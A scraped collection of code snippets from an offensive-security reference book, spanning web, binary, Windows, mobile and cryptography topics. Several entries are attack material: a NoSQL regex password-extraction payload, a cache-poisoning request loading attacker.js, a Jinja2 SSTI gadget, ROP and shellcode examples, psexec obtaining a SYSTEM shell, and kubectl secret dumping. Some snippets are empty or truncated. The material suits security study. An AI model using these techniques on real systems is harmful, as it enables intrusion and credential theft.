` headers
2. *Proxy* forwards this request to the backend
3. *Backend* implements websockets for the requested endpoint, so it returns a `101` status code with a `Sec-WebSocket-Accept:` header derived from the nonce
4. *Proxy* recognizes the status code and sees it is a successful WebSocket connection, so it switches the state of this TCP connection to allow binary data passthrough
5. *Client* and *Backend* can now **directly communicate** over WebSocket frames
```
--------------------------------
### Cache Resources Instantly with window.open() and bfcache
Source: https://book.jorianwoltjer.com/web/client-side/caching
This script demonstrates how to use `window.open()` to load resources uncached and then quickly navigate the opened window back to a page that triggers bfcache, falling back to disk cache for instantaneous loading. It's useful for exploiting gadgets that rely on DOM manipulation.
```html
"], { type: "text/html" })
setTimeout(() => {
w.location = URL.createObjectURL(blob);
}, 3500);
}
```
--------------------------------
### Start Android Emulator with Writable System Partition
Source: https://book.jorianwoltjer.com/mobile/http-s-proxy-for-android
This command starts an Android Virtual Device (AVD) with the '-writable-system' flag. This flag allows modifications to the system partition, which is necessary for permanently installing CA certificates.
```shell-session
$ emulator -avd PixelXL27 -writable-system
```
--------------------------------
### Substitution Cipher Solver (Shell Session)
Source: https://book.jorianwoltjer.com/cryptography/ciphers
Demonstrates the usage of a command-line tool 'sub-solver' for cracking substitution ciphers. The example shows the command to run the solver with a given ciphertext and displays the output, including potential solutions and the execution time.
```shell
$ time ./target/release/sub-solver -s "Tcxd dlzhrtm edbe ec tmcpfitd xs ecch rl ifercl"
[*] Using empty starting key
[*] Using built-in english wordlist
[+] Loaded 13255 unique patterns
[+] Saved dictionary cache
[*] Input string: "Tcxd dlzhrtm edbe ec tmcpfitd xs ecch rl ifercl"
[+] Parsed 9 input words
[+] Pruned impossible words
[*] Starting to find solutions...
?xoetc?la??nh??w?iys???m?g -> some english text to showcase my tool in action
?xoetc?la??nh??w?irs???m?g -> some english text to showcase mr tool in action
?xoetc?la??nh??w?ius???m?g -> some english text to showcase mu tool in action
[+] Finished! (3 solutions)
real 0m0.117s
```
--------------------------------
### Solidity Compiler Version Error Example
Source: https://book.jorianwoltjer.com/cryptography/blockchain/smart-contracts
Illustrates a common ParserError in Solidity when the contract requires a different compiler version than the one currently installed. The example shows how to identify the required version and adjust the pragma statement in the source file.
```solidity
Setup.sol:1:1: ParserError: Source file requires different compiler version (current compiler is 0.7.3+commit.9bfce1f6.Emscripten.clang) - note that nightly builds are considered to be strictly less than the released version
```
```diff
- pragma solidity ^0.8.18;
+ pragma solidity ^0.7.3;
```
--------------------------------
### Install Xdebug using PECL in Docker
Source: https://book.jorianwoltjer.com/languages/php
This Dockerfile snippet installs the Xdebug extension using PECL, configures it for debugging mode, and ensures it starts with every request. It's a streamlined approach for environments where PECL is available.
```docker
RUN yes | pecl install xdebug && \
echo "zend_extension=xdebug.so" > /usr/local/etc/php/conf.d/xdebug.ini && \
echo "xdebug.mode=debug" >> /usr/local/etc/php/conf.d/xdebug.ini && \
echo "xdebug.start_with_request=yes" >> /usr/local/etc/php/conf.d/xdebug.ini
```
--------------------------------
### Analyze Binary with rabin2 CLI
Source: https://book.jorianwoltjer.com/binary-exploitation/return-oriented-programming-rop
Provides an example of using the `rabin2` CLI tool from the radare2 framework to analyze a binary. It lists common options for extracting information such as functions, strings, symbols, and sections.
```shell
$ rabin2 [OPTIONS...] ./binary
* -i: Show functions
* -z: Show strings in .data section
* -s: Show all symbols
* -S: Show sections (with addresses)
```
--------------------------------
### Set up SMB Listener with Impacket
Source: https://book.jorianwoltjer.com/windows/active-directory-privilege-escalation
Starts an SMB server to receive dumped registry hives. It listens on all interfaces and writes files to the local 'share/' directory. This is a prerequisite for the BackupOperatorToDA tool.
```bash
sudo smbserver.py -smb2support -ip 0.0.0.0 share .
```
--------------------------------
### Apache CouchDB Regex Extraction
Source: https://book.jorianwoltjer.com/web/server-side/nosql-injection
Extracts information using regex in Apache CouchDB. This example uses the '$regex' operator to match passwords starting with 'a'.
```json
{
"username": "admin",
"password": {
"$regex": "^a"
}
}
```
--------------------------------
### Configure Seccomp Blocklist (C)
Source: https://book.jorianwoltjer.com/binary-exploitation/sandboxes-chroot-seccomp-and-namespaces
Shows a basic C example of configuring seccomp to create a blocklist. It initializes seccomp to kill the process on any syscall, then explicitly allows 'read' and 'write' syscalls before loading the filter.
```c
scmp_filter_ctx ctx; // define context variable to set up rules
// Kill the program on any syscall
ctx = seccomp_init(SCMP_ACT_KILL);
// ... except read (allow)
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0) == 0);
// ... except write (allow)
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0) == 0);
// load the context, rules are applied from now on
seccomp_load(ctx) == 0);
```
--------------------------------
### Basic PHP XSS Vulnerability Example
Source: https://book.jorianwoltjer.com/web/client-side/cross-site-scripting-xss
Demonstrates a simple PHP script that reflects user input directly into the HTML response without proper sanitization, making it vulnerable to XSS attacks. This example highlights how user-supplied data in a GET parameter can be exploited.
```php
```
--------------------------------
### Hashcat: Apply Rules to Wordlist for Password Generation
Source: https://book.jorianwoltjer.com/cryptography/hashing/cracking-hashes
Demonstrates using Hashcat with the `--stdout` flag to apply rules to a wordlist and generate potential passwords without actual cracking. This is useful for testing rule effectiveness. It shows examples of single-rule appending and multi-rule application using `.rule` files.
```shell-session
$ cat list.txt
password
secret
root
$ hashcat --stdout -a 0 -j 'u$1$2$3' list.txt
PASSWORD123
SECRET123
ROOT123
```
```shell-session
$ cat case.rule
l
u
$ cat 123.rule
$1
$2
$3
$ hashcat --stdout -r case.rule -r 123.rule list.txt
password1
PASSWORD1
password2
PASSWORD2
password3
PASSWORD3
secret1
SECRET1
secret2
SECRET2
secret3
SECRET3
root1
ROOT1
root2
ROOT2
root3
ROOT3
```
--------------------------------
### Connect to SMB Shares with smbclient
Source: https://book.jorianwoltjer.com/windows/scanning-spraying
Connect to an SMB share using 'smbclient' with provided credentials. This allows for file system traversal and file operations like listing, getting, and putting files.
```bash
smbclient -L //10.10.10.10 -U $USERNAME --password $PASSWORD
```
```bash
smbclient //10.10.10.10/share -U $USERNAME --password $PASSWORD
```
```bash
smbclient //10.10.10.10/share -U $USERNAME --pw-nt-hash $NTLM_HASH
```
--------------------------------
### Cache Poisoning Request Example
Source: https://book.jorianwoltjer.com/web/client-side/caching
Illustrates a malicious HTTP GET request designed to exploit cache poisoning by manipulating the URL path, potentially leading to the retrieval of an attacker-controlled script.
```http
GET /static/main.js#/../../uploads/attacker.js HTTP/1.1
```
--------------------------------
### Dump Certificates and SSL Keys with Volatility 2 and 3
Source: https://book.jorianwoltjer.com/forensics/memory-dumps-volatility
This section demonstrates how to dump certificates and SSL keys from a memory image using Volatility 2 and Volatility 3. Volatility 2 offers options like --pid, --name, and --ssl, while Volatility 3 uses a specific plugin.
```shell
# Interesting options for this module are: --pid, --name, --ssl
vol2 -f file.dmp --profile=PROFILE dumpcerts --dump-dir=dumpcerts # Dump certificates
```
```shell
vol3 -f file.dmp windows.registry.certificates.Certificates # Dump certificates
```
--------------------------------
### Trace Specific Application with Frida
Source: https://book.jorianwoltjer.com/mobile/frida
Attaches Frida to a specific application identified by its package name and begins tracing its functions. The '-U' flag is crucial for targeting the Android device.
```bash
frida-trace -U -N com.android.chrome
```
--------------------------------
### Trace Foreground Application with Frida
Source: https://book.jorianwoltjer.com/mobile/frida
Automatically attaches Frida to the application currently in the foreground on the Android device. This is a convenient shortcut for tracing the active app without needing its package name.
```bash
frida-trace -U -F
```
--------------------------------
### Execute Program via Syscall (64-bit)
Source: https://book.jorianwoltjer.com/binary-exploitation/return-oriented-programming-rop
Demonstrates how to execute a program using the `syscall` instruction on a 64-bit architecture. It specifically shows the setup for the `execve` system call, which requires the syscall number in `rax` and arguments in `rdi`, `rsi`, and `rdx`. This method is crucial for process execution in low-level programming.
```nasm
mov rax, 0x3b ; set rax to the syscall number for execve()
mov rdi, filename ; set rdi to the address of the filename string
mov rsi, argv ; set rsi to the address of the argument values array
mov rdx, envp ; set rdx to the address of the environment variables array
syscall ; invoke the syscall
```
--------------------------------
### Initialize and Commit in Git
Source: https://book.jorianwoltjer.com/forensics/git
Demonstrates the basic Git commands to initialize a repository and create a commit with a message. These are fundamental operations for version control.
```shell
git init
git commit -m "Initial commit"
```
--------------------------------
### List Processes on Android with Frida
Source: https://book.jorianwoltjer.com/mobile/frida
Lists all running processes on the connected Android device that Frida can attach to. The '-U' flag ensures the command targets the device via the Android bridge.
```shell-session
$ frida-ps -Ua
PID Name Identifier
---- ----------- ---------------------------------------
5852 Chrome com.android.chrome
1861 Google com.google.android.googlequicksearchbox
1861 Google com.google.android.googlequicksearchbox
1694 Messages com.google.android.apps.messaging
1053 SIM Toolkit com.android.stk
1056 Settings com.android.settings
```
--------------------------------
### Push and Run Frida Server on Android
Source: https://book.jorianwoltjer.com/mobile/frida
This sequence of commands pushes the Frida server binary to a temporary directory on the Android device, makes it executable, and then runs it. Ensure the device is rooted for the server to function correctly.
```bash
adb push frida-server-*-android-x86_64 /data/local/tmp/frida-server
```
```bash
adb shell chmod +x /data/local/tmp/frida-server
```
```bash
adb shell /data/local/tmp/frida-server
```
--------------------------------
### HTML Template Example with Caddy
Source: https://book.jorianwoltjer.com/web/server-side/reverse-proxies
An example of an HTML file that uses Go's `text/template` syntax to display request information, such as the User-Agent. This file would be served by Caddy when the `templates` directive is enabled.
```html
Your UA is: {{.Req.Header.Get "User-Agent"}}
```
--------------------------------
### Example Vulnerable PHP Code
Source: https://book.jorianwoltjer.com/languages/php
A common LFI vulnerability pattern in PHP where user input from the 'page' GET parameter is directly appended with '.php' and included. This is exploitable by chaining PHP filters.
```php
```
--------------------------------
### Generate and Verify MD5 Collisions using HashClash
Source: https://book.jorianwoltjer.com/cryptography/hashing
This snippet demonstrates the command-line process for generating MD5 identical prefix collisions using the HashClash tool and Python. It includes steps for creating a prefix file, running the collision script, and verifying the MD5 sums of the original and modified collision files. This showcases the practical application of HashClash for creating MD5 collisions.
```shell-session
$ python3 -c 'print("A"*64 + "B"*64 + "C"*64 + "test", end="")' > prefix # Create prefix
$ ../scripts/poc_no.sh prefix # Do collision (takes a few minutes)
...
$ md5sum collision*.bin # MD5 sums are the same
a83232a6730cdd6102d002e31ffd1c3f collision1.bin
a83232a6730cdd6102d002e31ffd1c3f collision2.bin
# # Append data to collisions
$ cat collision1.bin <(python3 -c 'print("D"*64 + "E"*64 + "F"*64, end="")') > collision1_extra.bin
$ cat collision2.bin <(python3 -c 'print("D"*64 + "E"*64 + "F"*64, end="")') > collision2_extra.bin
$ md5sum collision*_extra.bin # MD5 sums still match
e8842904b573ed3cd545a5b116f70af8 collision1_extra.bin
e8842904b573ed3cd545a5b116f70af8 collision2_extra.bin
```
--------------------------------
### List SMB Shares
Source: https://book.jorianwoltjer.com/windows/local-enumeration
Lists all available SMB shares on a remote machine (dc01 in this example) using the 'net view' command with the '/all' flag. This helps in discovering accessible network resources.
```powershell
net view \dc01 /all
```
--------------------------------
### Bypass SSL Pinning with Frida Script
Source: https://book.jorianwoltjer.com/mobile/frida
A Frida script designed to bypass SSL pinning and root detection in Android applications. This script overrides built-in certificate verification methods, allowing for normal HTTPS debugging.
```javascript
// Frida Root Detection and SSL Pinning Bypass script by @ahrixia
// (Content not provided in the input, refer to the embed URL for details)
```
--------------------------------
### Search ROP Gadgets with Ropper CLI
Source: https://book.jorianwoltjer.com/binary-exploitation/return-oriented-programming-rop
Demonstrates how to use the Ropper CLI tool to search for specific ROP gadgets within a binary. It shows how to search for gadgets containing a particular instruction, like 'xor', and how to pipe the output to grep for more flexible filtering.
```shell
$ ropper -f ./binary --search 'xor'
[INFO] Searching for gadgets: xor
[INFO] File: ./badchars
0x0000000000400628: xor byte ptr [r15], r14b; ret;
0x0000000000400629: xor byte ptr [rdi], dh; ret;
```
```shell
$ ropper -f ./binary | grep rdi
0x000000000040062d: add byte ptr [rdi], dh; ret;
0x00000000004006a3: pop rdi; ret;
0x0000000000400631: sub byte ptr [rdi], dh; ret;
0x0000000000400629: xor byte ptr [rdi], dh; ret;
```
--------------------------------
### Run Basic VBA Macro in Word
Source: https://book.jorianwoltjer.com/forensics/vba-macros
This VBA macro demonstrates a simple 'Hello, world!' message box. It's a basic example to show how to start and run a macro within a Word document using the Visual Basic editor.
```vba
Sub main()
MsgBox "Hello, world!"
End Sub
```
--------------------------------
### Download CodeQL Query Packs
Source: https://book.jorianwoltjer.com/languages/codeql
This command downloads a specific pack of CodeQL queries for a given language. It is useful when the default bundle does not include the necessary queries for your project's language.
```bash
codeql pack download codeql/python-queries
```
--------------------------------
### Example iOS Property List XML Structure
Source: https://book.jorianwoltjer.com/mobile/ios
This XML snippet represents the structure of an iOS property list file after being parsed by 'plistutil'. It shows a common format for storing key-value data, including strings and numbers, within an application.
```xml
secret
ExampleSecret
id
42
title
Some Title
```
--------------------------------
### Get Interactive Shell using psexec.py from Impacket (Bash)
Source: https://book.jorianwoltjer.com/windows/lateral-movement
Provides an example of using the psexec.py script from the Impacket suite to obtain an interactive shell on a remote Windows machine via SMB. This method also typically grants 'nt authority\system' privileges.
```shell-session
$ psexec.py '$USERNAME:$PASSWORD@$IP'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on $IP.....
[*] Found writable share ADMIN$
[*] Uploading file YUqMJypj.exe
[*] Opening SVCManager on $IP.....
[*] Creating service yddV on $IP.....
[*] Starting service yddV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
```
--------------------------------
### Iframe Navigation Example
Source: https://book.jorianwoltjer.com/web/client-side/caching
Demonstrates navigating away from a page containing an iframe, illustrating how policy containers like CSP are retained.
```html
Navigate away
```
--------------------------------
### Read Query Parameters in Flask Jinja2 SSTI
Source: https://book.jorianwoltjer.com/web/frameworks/flask
This Jinja2 expression allows reading values from query parameters in Flask. It's useful when direct command execution is difficult and you need to pass data via GET requests, for example, to construct a payload.
```django
{{request|attr("args")|attr("get")("a")}}
```
--------------------------------
### Find and Filter Linux Capabilities
Source: https://book.jorianwoltjer.com/linux/linux-privilege-escalation/filesystem-permissions
Demonstrates how to find files with specific capabilities assigned using the `getcap` command. It shows how to recursively search the entire filesystem (`-r /`) and filter the output to find specific capabilities like `cap_setuid`.
```shell
getcap -r / 2>/dev/null
```
```bash
getcap -r / 2>/dev/null | grep cap_setuid
```
--------------------------------
### Constructing Initial ROP Chain for sigreturn
Source: https://book.jorianwoltjer.com/binary-exploitation/return-oriented-programming-rop/sigreturn-oriented-programming-srop
Shows how to build the first part of a ROP chain using PwnTools to set the RAX register to 15 and then call the 'syscall' gadget. This prepares the stack for the sigreturn syscall.
```python
rop = ROP(elf)
rop.rax = 15 # Let PwnTools find a `pop rax; ret` gadget and use it
rop.call(SYSCALL) # Jump to syscall at `ret`
payload = flat({
OFFSET: rop.chain()
})
```
--------------------------------
### Kubernetes Cluster Interaction using kubectl (Shell Session)
Source: https://book.jorianwoltjer.com/cloud/kubernetes
Provides examples of using the kubectl command-line tool to interact with a Kubernetes cluster, including listing all resources, pods, secrets, executing commands in pods, and decoding secrets. Requires kubectl installed and configured.
```shell-session
# # List everything
$ kubectl get all --token $TOKEN --server $API_SERVER --insecure-skip-tls-verify
$ kubectl get pods # List pods
$ kubectl get secrets # List secrets
# # Execute an interactive shell with a pod
$ kubectl exec <POD_NAME> --stdin --tty -- /bin/bash
# # Get and decode a secret
$ kubectl get secret <SECRET_NAME> -o jsonpath='{.data.*}' | base64 -d
```
--------------------------------
### 32-bit Syscall Example using int 0x80 (Assembly)
Source: https://book.jorianwoltjer.com/binary-exploitation/sandboxes-chroot-seccomp-and-namespaces
This assembly code demonstrates how to use 32-bit syscalls via the `int 0x80` instruction. It opens a file named 'flag' and then uses `sendfile` to read its contents to standard output. This is an example of exploiting a scenario where 32-bit syscalls are enabled.
```asmatmel
mov eax, 5
lea ebx, [rip+flag]
mov ecx, 0
int 0x80 ; open("flag", O_RDONLY)
mov ecx, eax ; return value (fd)
mov eax, 187
mov ebx, 1 ; STDOUT
mov edx, 0
mov esi, 100
int 0x80 ; sendfile(STDOUT, flag_fd, 0, 100)
flag:
.string "flag"
```